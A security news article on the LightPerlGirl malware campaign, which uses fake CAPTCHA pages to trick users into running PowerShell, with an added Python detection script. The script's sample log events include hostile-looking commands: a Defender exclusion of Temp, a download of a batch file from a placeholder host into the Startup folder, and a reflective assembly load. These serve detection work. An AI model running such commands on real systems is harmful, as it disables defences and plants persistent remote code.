Cybersecurity experts have flagged a deceptive malware campaign that uses fake CAPTCHA pop-up windows to install a new threat dubbed LightPerlGirl. The attack tricks users into manually executing disguised PowerShell commands, making it harder for security tools to detect the intrusion.
Researchers at Todyl identified the threat after spotting unusual PowerShell activity on a partner’s compromised device. The campaign hijacks legitimate but previously breached WordPress sites to deliver a fake security check, mimicking trusted services like Cloudflare.
Instead of exploiting software vulnerabilities, the attackers rely on social engineering, prompting users to copy and run a command via the Windows Run dialog. Because the user types the command rather than a dropper executing it, there is no exploit or malicious download for traditional perimeter and endpoint controls to block at the point of entry.
LightPerlGirl, named after a signature in its code (“Copyright (c) LightPerlGirl 2025”) and embedded Russian strings, operates in multiple stealthy stages. The initial script contacts a command-and-control server to fetch a secondary payload, which includes three core functions:
- HelpIO: Attempts privilege escalation and weakens antivirus detection by adding the Temp folder to the Windows Defender exclusion list, so later-stage files dropped there are not scanned.
- Urex: Ensures persistence by downloading a batch file and adding a startup shortcut.
- ExWpL: Executes a fileless payload via .NET reflection, loading the assembly directly into memory—an evasion method that avoids writing detectable payload files to disk.
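The three stages above each leave a distinct trace in PowerShell script-block logging, and a defender can correlate them per host. The following is an added illustration, not code from Todyl or from the malware: it runs simple behavioural rules over constructed sample log events (the hostnames, URL and file names are made up) and flags a host only when several of the described stages appear together.

```python
import re

# Constructed sample PowerShell script-block log events (not real LightPerlGirl
# code): each dict is one ScriptBlock event with the fields a SIEM would carry.
SAMPLE_EVENTS = [
    {"host": "ws01", "script": "Add-MpPreference -ExclusionPath $env:TEMP"},
    {"host": "ws01", "script": "Invoke-WebRequest -Uri 'https://example.invalid/u.bat' "
                               "-OutFile \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\u.bat\""},
    {"host": "ws01", "script": "[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)"},
    {"host": "ws02", "script": "Get-ChildItem C:\\Users | Measure-Object"},
]

# One rule per stage described in the article: Defender exclusion of Temp (HelpIO),
# a file placed in the Startup folder (Urex), and a reflective in-memory assembly
# load (ExWpL). The patterns are generic behaviours, not malware signatures.
RULES = [
    ("defender_temp_exclusion",
     re.compile(r"Add-MpPreference\b.*-ExclusionPath\b.*(?:\$env:TEMP|\\Temp\b)", re.I)),
    ("startup_folder_persistence",
     re.compile(r"Start Menu\\Programs\\Startup", re.I)),
    ("reflective_assembly_load",
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\b", re.I)),
]


def classify(script):
    """Return the names of every rule the script block matches."""
    return [name for name, rx in RULES if rx.search(script)]


def triage(events, min_stages=2):
    """Group rule hits per host and flag hosts showing at least min_stages
    distinct stages; several stages together are a far stronger signal than one hit."""
    per_host = {}
    for ev in events:
        hits = classify(ev["script"])
        if hits:
            per_host.setdefault(ev["host"], set()).update(hits)
    flagged = sorted(h for h, hits in per_host.items() if len(hits) >= min_stages)
    return per_host, flagged


if __name__ == "__main__":
    per_host, flagged = triage(SAMPLE_EVENTS)
    for host in flagged:
        print(f"{host}: {', '.join(sorted(per_host[host]))}")
```

Script-block logging (Event ID 4104) must be enabled for these events to exist; a single Defender exclusion by an administrator is routine, which is why the host is only flagged on a combination of stages.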
This technique-heavy campaign shows how modern threats combine trusted interface mimicry with technical sophistication. The malware’s persistence mechanism ensures it stays active across reboots, maintaining covert access via its C2 infrastructure.
The attack underlines a broader shift in cyber threats—away from traditional exploits and toward manipulation of users through familiar interfaces, making them unwitting participants in compromising their systems.
Cybersecurity teams are urged to bolster endpoint protections and raise awareness around deceptive pop-ups, as attackers refine their methods to slip past even the most modern defense tools.
News Source: CybersecurityNews.com